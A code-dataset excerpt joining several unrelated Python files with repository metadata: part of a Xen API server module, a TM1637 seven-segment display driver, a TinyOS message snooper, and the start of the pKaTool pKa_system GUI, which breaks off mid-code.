def VIF_get_security_label(self, session, vif_ref):
return self._VIF_get(vif_ref, 'security_label')
def _VIF_set(self, ref, prop, val, old_val):
return XendDomain.instance().set_dev_property_by_uuid(
'vif', ref, prop, val, old_val)
def VIF_set_security_label(self, session, vif_ref, sec_lab, old_lab):
xendom = XendDomain.instance()
dom = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not dom:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
raise SecurityError(-xsconstants.XSERR_RESOURCE_IN_USE)
rc = self._VIF_set(vif_ref, 'security_label', sec_lab, old_lab)
if rc == False:
raise SecurityError(-xsconstants.XSERR_BAD_LABEL)
return xen_api_success(xsconstants.XSERR_SUCCESS)
# Xen API: Class VIF_metrics
# ----------------------------------------------------------------
VIF_metrics_attr_ro = ['io_read_kbs',
'io_write_kbs',
'io_total_read_kbs',
'io_total_write_kbs',
'last_updated']
VIF_metrics_attr_rw = []
VIF_metrics_methods = []
def VIF_metrics_get_all(self, session):
return self.VIF_get_all(session)
def VIF_metrics_get_record(self, _, ref):
vm = XendDomain.instance().get_vm_with_dev_uuid('vif', ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF_metrics', ref])
return xen_api_success(
{ 'io_read_kbs' : vm.get_dev_property('vif', ref, 'io_read_kbs'),
'io_write_kbs' : vm.get_dev_property('vif', ref, 'io_write_kbs'),
'io_total_read_kbs' : vm.get_dev_property('vif', ref, 'io_total_read_kbs'),
'io_total_write_kbs' : vm.get_dev_property('vif', ref, 'io_total_write_kbs'),
'last_updated' : now()
})
def VIF_metrics_get_io_read_kbs(self, _, ref):
return self._VIF_get(ref, 'io_read_kbs')
def VIF_metrics_get_io_write_kbs(self, session, ref):
return self._VIF_get(ref, 'io_write_kbs')
def VIF_metrics_get_io_total_read_kbs(self, _, ref):
return self._VIF_get(ref, 'io_total_read_kbs')
def VIF_metrics_get_io_total_write_kbs(self, session, ref):
return self._VIF_get(ref, 'io_total_write_kbs')
def VIF_metrics_get_last_updated(self, _1, _2):
return xen_api_success(now())
# Xen API: Class console
# ----------------------------------------------------------------
console_attr_ro = ['location', 'protocol', 'VM']
console_attr_rw = ['other_config']
console_methods = [('destroy', None)]
console_funcs = [('create', 'console'),
('create_on', 'console')]
def console_get_all(self, session):
xendom = XendDomain.instance()
# cons = list(BNPoolAPI._consoles_to_VM.keys())
cons = [d.get_consoles() for d in XendDomain.instance().list('all')]
cons = reduce(lambda x, y: x + y, cons)
return xen_api_success(cons)
def console_get_location(self, session, console_ref):
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_console(console_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_get_location(console_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "console_get_location", console_ref)
else:
return self._console_get_location(console_ref)
def _console_get_location(self, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'location'))
def console_get_protocol(self, session, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'protocol'))
def console_get_VM(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
return xen_api_success(vm.get_uuid())
def console_get_other_config(self, session, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'other_config'))
# object methods
def _console_get_record(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'console', console_ref])
cfg = vm.get_dev_xenapi_config('console', console_ref)
log.debug(cfg)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'console', console_ref])
valid_console_keys = self.console_attr_ro + self.console_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_console_keys:
return_cfg[k] = cfg[k]
return xen_api_success(return_cfg)
def console_get_record(self, session, console_ref):
if BNPoolAPI._isMaster:
# try:
host_ref = BNPoolAPI.get_host_by_console(console_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_get_record(session, console_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'console_get_record', console_ref)
# proxy = ServerProxy('http://' + remote_ip + ':9363')
# response = proxy.session.login('root')
# if cmp(response['Status'], 'Failure') == 0:
# return xen_api_error(response['ErrorDescription'])
# session_ref = response['Value']
# return proxy.console.get_record(session_ref, console_ref)
# except KeyError:
# return xen_api_error(['key error', console_ref])
# except socket.error:
# return xen_api_error(['socket error', console_ref])
else:
return self._console_get_record(session, console_ref)
def console_create_on(self, session, console_struct, host_ref):
if BNPoolAPI._isMaster:
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.console_create(session, console_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(remote_ip, 'console_create', console_struct)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct("console_create", response.get('Value'), console_struct.get('VM'))
return response
else:
return self.console_create(session, console_struct)
def console_create(self, session, console_struct):
vm_ref = console_struct['VM']
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_create(session, console_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'console_create', console_struct)
else:
return self._console_create(session, console_struct)
def _console_create(self, session, console_struct):
xendom = XendDomain.instance()
if not xendom.is_valid_vm(console_struct['VM']):
return xen_api_error(['HANDLE_INVALID', 'VM',
console_struct['VM']])
dom = xendom.get_vm_by_uuid(console_struct['VM'])
try:
if 'protocol' not in console_struct:
return xen_api_error(['CONSOLE_PROTOCOL_INVALID',
'No protocol specified'])
console_ref = dom.create_console(console_struct)
xendom.managed_config_save(dom)
BNPoolAPI.update_data_struct("console_create", console_ref, dom.get_uuid())
return xen_api_success(console_ref)
except XendError, exn:
return xen_api_error(['INTERNAL_ERROR', str(exn)])
def console_destroy(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'Console', console_ref])
vm.destroy_console(console_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def console_set_other_config(self, session, console_ref, other_config):
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('console', console_ref)
vm.set_console_other_config(console_ref, other_config)
xd.managed_config_save(vm)
return xen_api_success_void()
class BNVMAPIAsyncProxy:
""" A redirector for Async.Class.function calls to XendAPI
but wraps the call for use with the XendTaskManager.
@ivar xenapi: Xen API instance
@ivar method_map: Mapping from XMLRPC method name to callable objects.
"""
method_prefix = 'Async.'
def __init__(self, xenapi):
"""Initialises the Async Proxy by making a map of all
implemented Xen API methods for use with XendTaskManager.
@param xenapi: XendAPI instance
"""
self.xenapi = xenapi
self.method_map = {}
for method_name in dir(self.xenapi):
method = getattr(self.xenapi, method_name)
if method_name[0] != '_' and hasattr(method, 'async') \
and method.async == True:
self.method_map[method.api] = method
def _dispatch(self, method, args):
"""Overridden method so that SimpleXMLRPCServer will
resolve methods through this method rather than through
inspection.
@param method: marshalled method name from XMLRPC.
@param args: marshalled arguments from XMLRPC.
"""
# Only deal with method names that start with "Async."
if not method.startswith(self.method_prefix):
return xen_api_error(['MESSAGE_METHOD_UNKNOWN', method])
# Lookup synchronous version of the method
synchronous_method_name = method[len(self.method_prefix):]
if synchronous_method_name not in self.method_map:
return xen_api_error(['MESSAGE_METHOD_UNKNOWN', method])
method = self.method_map[synchronous_method_name]
# Check that we've got enough arguments before issuing a task ID.
needed = argcounts[method.api]
if len(args) != needed:
return xen_api_error(['MESSAGE_PARAMETER_COUNT_MISMATCH',
self.method_prefix + method.api, needed,
len(args)])
# Validate the session before proceeding
session = args[0]
if not auth_manager().is_session_valid(session):
return xen_api_error(['SESSION_INVALID', session])
# create and execute the task, and return task_uuid
return_type = getattr(method, 'return_type', '<none/>')
task_uuid = XendTaskManager.create_task(method, args,
synchronous_method_name,
return_type,
synchronous_method_name,
session)
return xen_api_success(task_uuid)
def instance():
"""Singleton constructror. Use this method instead of the class constructor.
"""
global inst
try:
inst
except:
inst = BNVMAPI(None)
return inst
| mit | -6,386,652,897,247,954,000 | 40.294742 | 164 | 0.508084 | false | 3.707909 | true | false | false |
KyleKing/PiAlarm | .archive-python/modules/tm1637.py | 1 | 6795 | """Manipulate a TM1637 7-segment display."""
import math
import threading
from time import localtime, sleep
from . import config as cg
from .context import IO
IO.setwarnings(False)
IO.setmode(IO.BCM)
HexDigits = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d,
0x07, 0x7f, 0x6f, 0x77, 0x7c, 0x39, 0x5e, 0x79, 0x71]
ADDR_AUTO = 0x40
ADDR_FIXED = 0x44
STARTADDR = 0xC0
class TM1637(object):
"""TM1637 7-Segment Display."""
def __init__(self, clk, dio, brightness=1.0):
"""Initializer."""
self.CLK = clk
self.DIO = dio
self.brightness = brightness
self.double_point = False
self.current_values = [0, 0, 0, 0]
IO.setup(self.CLK, IO.OUT)
IO.setup(self.DIO, IO.OUT)
def cleanup(self):
"""Stop updating clock, turn off display, and cleanup GPIO."""
self.stop_clock()
self.clear()
IO.cleanup()
def clear(self):
"""Clear display."""
b = self.brightness
point = self.double_point
self.brightness = 0
self.double_point = False
data = [0x7F, 0x7F, 0x7F, 0x7F]
self.show(data)
# Restore previous settings:
self.brightness = b
self.double_point = point
def show(self, data):
"""Show data on display."""
for i in range(0, 4):
self.current_values[i] = data[i]
self.start()
self.write_byte(ADDR_AUTO)
self.br()
self.write_byte(STARTADDR)
for i in range(0, 4):
self.write_byte(self.coding(data[i]))
self.br()
self.write_byte(0x88 + int(self.brightness))
self.stop()
def set_digit(self, idx, data):
"""Set 7-segment digit by index [0, 3]."""
assert not (idx < 0 or idx > 3), 'Index must be in (0,3). Args: ({},{})'.format(idx, data)
self.current_values[idx] = data
self.start()
self.write_byte(ADDR_FIXED)
self.br()
self.write_byte(STARTADDR | idx)
self.write_byte(self.coding(data))
self.br()
self.write_byte(0x88 + int(self.brightness))
self.stop()
def set_brightness(self, percent):
"""Set brightness in range 0-1."""
max_brightness = 7.0
brightness = math.ceil(max_brightness * percent)
if (brightness < 0):
brightness = 0
if (self.brightness != brightness):
self.brightness = brightness
self.show(self.current_values)
def show_colon(self, on):
"""Show or hide double point divider."""
if (self.double_point != on):
self.double_point = on
self.show(self.current_values)
def write_byte(self, data):
"""Write byte to display."""
for i in range(0, 8):
IO.output(self.CLK, IO.LOW)
if (data & 0x01):
IO.output(self.DIO, IO.HIGH)
else:
IO.output(self.DIO, IO.LOW)
data = data >> 1
IO.output(self.CLK, IO.HIGH)
# Wait for ACK
IO.output(self.CLK, IO.LOW)
IO.output(self.DIO, IO.HIGH)
IO.output(self.CLK, IO.HIGH)
IO.setup(self.DIO, IO.IN)
while IO.input(self.DIO):
sleep(0.001)
if (IO.input(self.DIO)):
IO.setup(self.DIO, IO.OUT)
IO.output(self.DIO, IO.LOW)
IO.setup(self.DIO, IO.IN)
IO.setup(self.DIO, IO.OUT)
def start(self):
"""Send start signal to TM1637."""
IO.output(self.CLK, IO.HIGH)
IO.output(self.DIO, IO.HIGH)
IO.output(self.DIO, IO.LOW)
IO.output(self.CLK, IO.LOW)
def stop(self):
"""Stop clock."""
IO.output(self.CLK, IO.LOW)
IO.output(self.DIO, IO.LOW)
IO.output(self.CLK, IO.HIGH)
IO.output(self.DIO, IO.HIGH)
def br(self):
"""Terse break."""
self.stop()
self.start()
def coding(self, data):
"""Set coding of display."""
point_data = 0x80 if self.double_point else 0
return 0 if data == 0x7F else HexDigits[data] + point_data
def clock(self, military_time):
"""Clock thread script."""
# Based on: https://github.com/johnlr/raspberrypi-tm1637
self.show_colon(True)
while (not self.__stop_event.is_set()):
t = localtime()
hour = t.tm_hour
if not military_time:
hour = 12 if (t.tm_hour % 12) == 0 else t.tm_hour % 12
d0 = hour // 10 if hour // 10 else 0
d1 = hour % 10
d2 = t.tm_min // 10
d3 = t.tm_min % 10
digits = [d0, d1, d2, d3]
self.show(digits)
# # Optional visual feedback of running alarm:
# print digits
# for i in tqdm(range(60 - t.tm_sec)):
for i in range(60 - t.tm_sec):
if (not self.__stop_event.is_set()):
sleep(1)
def start_clock(self, military_time=True):
"""Start clock thread."""
# Stop event based on: http://stackoverflow.com/a/6524542/3219667
self.__stop_event = threading.Event()
self.__clock_thread = threading.Thread(target=self.clock, args=(military_time,))
self.__clock_thread.daemon = True # stops w/ main thread
self.__clock_thread.start()
def stop_clock(self):
"""Stop clock thread."""
try:
print('Attempting to stop live clock')
self.__stop_event.set()
self.clear()
except AttributeError:
print('No clock to close')
if __name__ == '__main__':
"""Confirm the display operation"""
# Initialize the clock (GND, VCC=3.3V, Example Pins are DIO=20 and CLK=21)
clock = cg.get_pin('7Segment', 'clk')
digital = cg.get_pin('7Segment', 'dio')
display = TM1637(CLK=clock, DIO=digital, brightness=1.0)
print('clock', clock)
print('digital', digital)
display.clear()
digits = [1, 2, 3, 4]
display.show(digits)
input('1234 - Working? (Press Key)')
print('Updating one digit at a time:')
display.clear()
display.set_digit(1, 3)
sleep(0.5)
display.set_digit(2, 2)
sleep(0.5)
display.set_digit(3, 1)
sleep(0.5)
display.set_digit(0, 4)
input('4321 - (Press Key)')
print('Add double point\n')
display.show_colon(True)
sleep(0.2)
print('Brightness Off')
display.set_brightness(0)
sleep(0.5)
print('Full Brightness')
display.set_brightness(1)
sleep(0.5)
print('30% Brightness')
display.set_brightness(0.3)
sleep(0.3)
input('Start the clock?')
display.start_clock(military_time=True)
input('Stop the clock?')
display.stop_clock()
| mit | -4,063,615,821,204,735,500 | 28.16309 | 98 | 0.547903 | false | 3.347291 | false | false | false |
fresskarma/tinyos-1.x | tools/python/pytos/util/MessageSnooper.py | 1 | 4759 | #!/usr/bin/python
#$Id: MessageSnooper.py,v 1.2 2005/10/27 02:23:37 kaminw Exp $
# "Copyright (c) 2000-2003 The Regents of the University of California.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose, without fee, and without written agreement
# is hereby granted, provided that the above copyright notice, the following
# two paragraphs and the author appear in all copies of this software.
#
# IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR
# DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT
# OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF THE UNIVERSITY
# OF CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS
# ON AN "AS IS" BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS."
#
# @author Kamin Whitehouse
#
import sys
import pytos.Comm as Comm
import pytos.tools.Drain as Drain
import pytos.tools.Drip as Drip
import threading
def registerAllMsgs(msgs, msgQueue, connection) :
for msgName in msgs._msgNames :
msg = msgs[msgName]
connection.register( msg , msgQueue )
class MessageSnooper( object ) :
"""This module offers \"register\" and \"unregister\" functions that
take a messageHandler argument but no message type argument.
Instead, the messageHandler will receive ALL incoming messages. It
currently handles local receive, drain messages, rpc messages, and
ramSymbol messages. Any new routing protocols should be
incorporated into this module.
usage:
snooper = MessageSnooper(app)
snooper.start
snooper.stop
snooper.register(callbackFcn)
snooper.unregister(callbackFcn)
"""
def __init__( self , app="" ) :
self.app = app
self.listeners = []
msgQueue = Comm.MessageQueue(10)
#register the msgQueue for all message types with localComm
comm = Comm.getCommObject(self.app, self.app.motecom)
registerAllMsgs(self.app.msgs, msgQueue, comm)
#register the msgQueue for all message types with drain and unregister DrainMsg with localComm
if "AM_DRAINMSG" in self.app.enums._enums :
drains = Drain.getDrainObject(self.app)
for drain in drains:
registerAllMsgs(self.app.msgs, msgQueue, drain)
comm.unregister(self.app.msgs.DrainMsg, msgQueue)
#if rpc is imported
if self.app.__dict__.has_key("rpc") :
#make sure a drip object exists for snooping on cmds
drips = Drip.getDripObject(self.app, self.app.motecom, self.app.enums.AM_RPCCOMMANDMSG)
#register the msgQueue for all rpc response messages
for command in self.app.rpc._messages.values() :
command.register(msgQueue)
#and unregister RpcResponseMsg from drain
drains = Drain.getDrainObject(self.app, self.app.motecom, 0xfffe) #ugh... hard coded number
for drain in drains:
drain.unregister(app.msgs.RpcResponseMsg, msgQueue)
#if ram symbols is imported
if self.app.__dict__.has_key("ramSymbols") :
#register the msgQueue for all ram symbol response messages
for symbol in self.app.ramSymbols._messages.values() :
symbol.registerPeek(msgQueue)
symbol.registerPoke(msgQueue)
#and unregister from peek/poke rpc commands
self.app.RamSymbolsM.peek.unregister(msgQueue)
self.app.RamSymbolsM.poke.unregister(msgQueue)
#register the msgQueue for all message types with drip and unregister DripMsg with localComm
if "AM_DRIPMSG" in self.app.enums._enums :
drips = Drip.getDripObject(self.app)
for drip in drips:
print "actually dtrying to register dripmsgs\n"
registerAllMsgs(self.app.msgs, msgQueue, drip)
comm.unregister(self.app.msgs.DripMsg, msgQueue)
self.running = True
msgThread = threading.Thread(target=self.processMessages,
args=(msgQueue,))
msgThread.setDaemon(True)
msgThread.start()
def processMessages(self, msgQueue) :
while True :
(addr,msg) = msgQueue.get()
if self.running == True :
for listener in self.listeners :
listener.messageReceived(addr, msg)
def stop(self) :
self.running = False
def start(self) :
self.running = True
def register(self, msgHandler) :
self.listeners.append(msgHandler)
def unregister(self, msgHandler) :
self.listeners.remove(msgHandler)
| bsd-3-clause | 8,937,040,000,648,870,000 | 37.691057 | 98 | 0.709603 | false | 3.616261 | false | false | false |
dmnfarrell/peat | pKaTool/pKa_system.py | 1 | 55804 | #!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
#
# pKaTool - analysis of systems of titratable groups
# Copyright (C) 2010 Jens Erik Nielsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
# Normal mail:
# Jens Nielsen
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland
import sys
from Tkinter import *
import tkFileDialog
import pKa_base, pKa_system_help, pKa_calc, pKa_system_micro, pKa_system_file_menu, CCPS_stab_opt
import pKa_system_data_manipulation
import group_control
import ftir_data
__pKaSystemVersion__=1.2
#
# Geometry helper functions
#
def get_y_fromstab(val,span):
"""Get the y coordinate for plotting the stability curve"""
zero=10
graphrange=180
if span==0:
span=10
return (graphrange-val*(graphrange/span))+zero
#
# --------
#
class pKa_system(Frame,pKa_base.pKa_base,pKa_system_help.system_help,
pKa_system_help.pKsensitivity,
pKa_system_help.decompose,
pKa_system_micro.Micro_states,
pKa_system_file_menu.file_menu,
pKa_system_file_menu.fit_menu,
pKa_system_data_manipulation.data_manipulation,
CCPS_stab_opt.Optimisation_Analysis):
def __init__(self,numgroups=None,parent_application=None,data=None,protein=None,field_name=None,update=True):
#
# Set up the main window
#
# The main window provides choice between the different modes
# for now: pKa Calculations, pKa System
#
self.ID='pKa_system'
self.font="Times 12 bold"
self.fg_colour='white'
self.bg_colour='black'
self.colour_order=['#646464','#4444ff','red','green','magenta','yellow','orange','grey','magenta']
self.linewidth=2
self.names={}
self.lastdir=None
self.parent_application=parent_application
self.init_not_done=1
self.ID='pKa_system'
self.protein=protein
self.field_name=field_name
#
# Stability window parameters
#
self.stab_window=None
self.U_control=None
self.old_stab_status=''
self.exp_stab_curve=False
#
# Set the pKa calculation parameters
#
self.pHstart=0.00001
self.pHend=20.0
self.maxcrg=1.0
self.mincrg=-1.0
#
# pKa method
#
self.pkamethods={'Boltzmann':pKa_calc.Boltzmann,
'Monte Carlo':pKa_calc.Monte_Carlo,
'Tanford-Roxby':pKa_calc.Tanford_Roxby,
'Monte Carlo (C++)':pKa_calc.Monte_Carlo_CPP,
'Boltzmann (C++)':pKa_calc.Boltzmann_CPP}
#
# Check if we are called from EnzSim
#
self.enzsim=False
if protein=='__enzsim_application__':
self.enzsim=True
#
# Set data
#
self.data={'numgroups':numgroups}
#
# All lines drawn
#
self.lines={}
self.state_lines={}
self.stab_lines={}
self.to_clear=[]
self.stab_test_on=None
#
# Do the window
#
self.do_window()
if update:
self.update_pkasystem_curves()
self.window.update_idletasks()
#
# convert data
#
if data:
if data.has_key('groups'):
self.unpack_all_data(data)
else:
self.convert_titration_data(data)
return
#
# ------
#
def do_window(self):
#
# Main window
#
if not self.parent_application:
Frame.__init__(self)
self.window=self.master
else:
self.window=Toplevel()
#
# Title
#
#self.window.geometry('+280+380')
self.window.title("pKa System - Play with titratable groups")
#
# Get the size of the screen
#
#
# Text box til top
#
label1=Label(self.window, text="Enter number of titratable groups",font=self.font)
label1.grid(row=0,column=0, sticky=W)
#
# Entry field
#
self.number_of_groups=IntVar()
self.numgrps_widget=Entry(self.window,textvariable=self.number_of_groups)
#
# If we have a number then insert it
#
if self.data['numgroups']:
self.number_of_groups.set(self.data['numgroups'])
self.numgrps=self.data['numgroups']
self.window.destroy()
else:
def destroy(event=None):
self.numgrps=int(self.number_of_groups.get())
self.window.destroy()
return
self.number_of_groups.set(3)
self.numgrps_widget.grid(row=0,column=1,sticky=W)
self.numgrps_widget.bind('<Return>',destroy)
self.window.wait_window(self.window)
#
# Done
#
self.getgrps()
return
#
# --------------
#
def getgrps(self,event=None):
#
# Get the number of groups
#
import string
#
# Open the window for the titration curves
#
if not self.parent_application:
Frame.__init__(self)
self.window=self.master
screen_width=self.winfo_screenwidth()
screen_height=self.winfo_screenheight()
else:
self.window=Toplevel()
screen_width=self.parent_application.winfo_screenwidth()
screen_height=self.parent_application.winfo_screenheight()
#
self.titwin=self.window
self.titwin.title('Titration curves [native]')
#self.titwin.geometry('+20+%d' %(95+self.numgrps*43))
#
# Draw the window with the titration curves
#
self.titwidth=1200
self.titheight=450
self.tc=Canvas(self.titwin,bd=5,bg='white',width=self.titwidth,
height=self.titheight,
scrollregion=(0,0,self.titwidth,self.titheight))
self.tc.xview("moveto", 0)
self.tc.yview("moveto", 0)
self.tc.grid(row=0,column=0)
#
# Axes
#
self.draw_ordinates(self.tc)
#
# Open window with the controls
#
self.startrow=3
self.groups={}
self.win=Toplevel()
#
# Create the main pulldown menu
#
self.menu=Menu(self.win)
#
# File menu
#
self.file_menu=Menu(self.menu,tearoff=0)
self.file_menu.add_command(label='Load system',command=self.load_system)
self.file_menu.add_command(label='Save system',command=self.save_system)
if self.parent_application:
if getattr(self.parent_application,'ID',None):
if self.parent_application.ID=='EAT':
self.file_menu.add_command(label='Save system in EAT & Exit',command=self.send_system_to_EAT)
elif self.parent_application.ID=='Ekin':
self.file_menu.add_command(label='Save system in EAT',command=self.send_system_to_EAT)
self.file_menu.add_command(label='Load titration curves',command=self.load_curves)
self.file_menu.add_command(label='Save titration curves',command=self.save_curves)
self.file_menu.add_command(label='Load titration_DB data',command=self.load_titdb)
self.file_menu.add_command(label='Load pH activity profile',command=self.load_pH_activity_profile)
self.file_menu.add_command(label='Load pH stability profile',command=self.load_pH_stability_profile)
self.file_menu.add_command(label='Load FTIR data',command=self.load_FTIR_data)
self.file_menu.add_command(label='Print population table',command=self.print_table)
self.file_menu.add_command(label='Add group',command=self.add_group)
self.file_menu.add_command(label='Remove exp. titration curve',command=self.remove_exp_curve)
self.file_menu.add_command(label='Exit',command=self.quit_application)
self.menu.add_cascade(label='File',menu=self.file_menu)
#
# Command menu
#
self.command_menu=Menu(self.menu,tearoff=0)
self.command_menu.add_command(label='Decompose system',command=self.decompose_system)
self.command_menu.add_command(label='Sensitivity analysis',command=self.sensitivity_test)
self.command_menu.add_command(label='Change dielectric constant',command=self.change_dielectric)
self.command_menu.add_command(label='Activate updating',command=self.activate_callbacks)
self.command_menu.add_command(label='Deactivate updating',command=self.deactivate_callbacks)
self.command_menu.add_separator()
self.command_menu.add_command(label='Copy group to EAT_DB Ekin',command=self.copy_to_Ekin)
self.menu.add_cascade(label='Command',menu=self.command_menu)
#
# Fitting menu
#
self.fit_menu=Menu(self.menu,tearoff=0)
self.fit_menu.add_command(label='Fit system to loaded curves',command=self.fit_system_to_curves)
self.fit_menu.add_command(label='Fit to pH-activity profile',command=self.fit_to_ph_activity_profile)
self.fit_menu.add_command(label='Fit to loaded curves and pH-activity profile',command=self.fit_to_curves_and_ph_activity_profile)
self.fit_menu.add_command(label='Estimate experimental uncertainty',command=self.estimate_experimental_uncertainty)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Fit to FTIR data',command=self.fit_ftir)
self.fit_menu.add_command(label='Fit to FTIR data and pH-activity profile',command=self.fit_to_ftir_and_ph_activity_profile)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Combinatorial scan',command=self.combinatorial_scan)
self.fit_menu.add_command(label='Show close parameter sets',command=self.show_close)
self.fit_menu.add_command(label='Test uniqueness',command=self.test_uniqueness)
self.fit_menu.add_command(label='Uniqueness scan',command=self.uniqueness_scan)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Evaluate fit',command=self.evaluate_fit)
self.geom_var=StringVar()
self.fit_menu.add_command(label="Do geometry optimisation",command=self.start_geom)
self.fit_menu.add_command(label='Identify number of groups in system',command=self.identify_no_groups)
self.menu.add_cascade(label='NMR',menu=self.fit_menu)
#
# System analysis and optimisation
#
self.optana_menu=Menu(self.menu,tearoff=0)
self.optana_menu.add_command(label='CCPS population/Stability',command=self.stab_and_CCPS_pop)
self.menu.add_cascade(label='Optimise and Analyse',menu=self.optana_menu)
#
# View menu
#
self.view_menu=Menu(self.menu,tearoff=0)
# Show microscopic states
self.micro_var=IntVar()
self.micro_var.set(0)
self.view_menu.add_checkbutton(label='Microscopic titration',
command=self.update_pkasystem_curves,
variable=self.micro_var,onvalue=1,offvalue=0)
# Show loaded titration curves
self.display_loaded_curves=IntVar()
self.display_loaded_curves.set(0)
self.view_menu.add_checkbutton(label='Loaded titration curves',
command=self.update_pkasystem_curves,
variable=self.display_loaded_curves,onvalue=1,offvalue=0)
# Show ftir window
self.show_ftir=IntVar()
self.show_ftir.set(0)
self.view_menu.add_checkbutton(label='Show FTIR window',
command=self.update_pkasystem_curves,
variable=self.show_ftir,onvalue=1,offvalue=0)
#
# Window for manipulating kcat of microstates
#
self.kcat_window_visible=IntVar()
self.kcat_window_visible.set(0)
self.view_menu.add_checkbutton(label='kcat of microstates',
command=self.toggle_kcat_window,variable=self.kcat_window_visible,onvalue=1,offvalue=0)
self.menu.add_cascade(label='View',menu=self.view_menu)
#
# Help menu
#
self.help_menu=Menu(self.menu,tearoff=0)
self.help_menu.add_command(label='About pKaSystem',command=self.about)
self.menu.add_cascade(label='Help',menu=self.help_menu)
#
# Configure the menu
#
self.win.config(menu=self.menu)
#
self.win.title('Group controls')
#
# Place window close to center
#
self.win.geometry('+%d+%d' %(screen_width/2-min(600,screen_width/4),screen_height/2-min(500,screen_height/3)))
#
# Buttons for each group
#
int_ene=1
for id_num in range(self.numgrps):
#colour=self.colour_order[id_num%len(self.colour_order)]
int_ene=1
self.groups[id_num]=group_control.group_control(self,
self.startrow+id_num,
id_num,
self.numgrps,
int_ene,
self.colour_order)
#
# Button for controlling stability window
#
self.stability_var=StringVar()
self.stability_var.set('off')
self.stab_button=Checkbutton(self.win,text='Stability curve: ',
variable=self.stability_var,onvalue='on',
offvalue='off',
command=self.stability_on_off)
self.stab_button.deselect()
self.stab_button.grid(row=0,column=0,columnspan=2)
#
# Exit button
#
if self.enzsim:
self.exit_bt=Button(self.win,text='Data->EnzSim',command=self.quit_application)
else:
self.exit_bt=Button(self.win,text='Quit',command=self.quit_application)
self.exit_bt.grid(row=0,column=2,sticky='wens')
#
# Snapshot button
#
self.snapshot_btn=Button(self.win,text='Snapshot',command=self.snapshot)
self.snapshot_btn.grid(row=0,column=3,sticky='wens')
#
# Window capture button
#
self.print_btn=Button(self.win,text='Print2File',command=self.print2file)
self.print_btn.grid(row=0,column=4,sticky='wens')
#
# Clear button
#
self.clr_btn=Button(self.win,text='Clear all',command=self.clear)
self.clr_btn.grid(row=0,column=5,sticky='wens')
#
# pHstep slider
#
self.pHstep=DoubleVar()
self.pHstep_sl=Scale(self.win,from_=0.01,to=2.0,resolution=0.01,
orient='horizontal',relief='ridge',
command=self.update_pkasystem_curves,variable=self.pHstep,
label='pHstep')
self.pHstep_sl.grid(row=0,column=6,sticky='wens')
self.pHstep.set(0.5)
#
# pKa calculation method selector
#
self.pkamethod_sel=StringVar()
self.pkamethod_sel.set('Boltzmann')
self.pkamethod_button=Menubutton(self.win,textvariable=self.pkamethod_sel,relief=RAISED)
self.pkamethod_menu=Menu(self.pkamethod_button,tearoff=0)
self.pkamethod_button['menu']=self.pkamethod_menu
#
# Methods
#
for method in self.pkamethods.keys():
